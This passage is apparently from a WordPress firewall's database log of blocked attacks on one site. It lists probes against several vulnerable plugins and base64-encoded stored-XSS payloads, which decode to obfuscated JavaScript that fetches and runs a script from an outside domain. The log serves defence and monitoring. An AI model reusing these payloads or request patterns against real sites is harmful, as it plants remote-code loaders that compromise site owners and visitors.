Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37859,1569949953.219235,1569949952.060000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37811,1569949766.071311,1569949764.202600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37812,1569949787.621609,1569949786.183200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37810,1569949771.367851,1569949767.596000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37813,1569949849.911563,1569949848.948000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37809,1569949775.149669,1569949773.415100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37865,1569949938.133223,1569949936.865300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37625,1569411061.291277,1569411060.443900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37655,1569411604.562354,1569411602.273100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37626,1569411059.530814,1569411055.271200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37627,1569411054.063376,1569411046.866800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37656,1569411595.776999,1569411594.964700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37628,1569411091.991862,1569411087.401400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37629,1569411086.009414,1569411085.194000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37630,1569411084.253340,1569411079.575100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37631,1569411219.051524,1569411218.113800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37639,1569411227.389749,1569411225.213800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37781,1569949723.889631,1569949722.033100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options 